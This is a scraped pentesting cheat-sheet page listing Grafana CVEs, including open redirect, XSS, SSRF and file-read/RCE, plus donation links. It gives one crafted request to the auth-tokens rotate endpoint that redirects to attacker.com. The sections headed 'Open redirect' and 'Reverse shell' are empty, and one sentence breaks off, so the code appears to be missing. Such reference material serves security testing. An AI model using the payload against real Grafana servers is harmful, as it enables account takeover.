Grafana

Grafana exploits

ko-fiarrow-up-right

CVE-2025-6023 - Open Redirection leading to XSS / ATO

GET /user/auth-tokens/rotate?redirectTo=/%23/..///attacker.com HTTP/1.1 results in a 302 redirect that is a valid open redirect to attacker.com

CVE-2025-4123 - SSRF, XSS

Affected Versions: Grafana 11.2, Grafana 11.3, Grafana 11.4, Grafana 11.5, Grafana 11.6, Grafana 12.0

Open redirect:

Grafana arbitrary file-read / RCE (CVE-2024-9264)

Grafana versions 11.0.x, 11.1.x and

Reverse shell:

Interesting Books

Interesting Bookschevron-right
circle-info

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

ko-fiarrow-up-right

buymeacoffeearrow-up-right

Last updated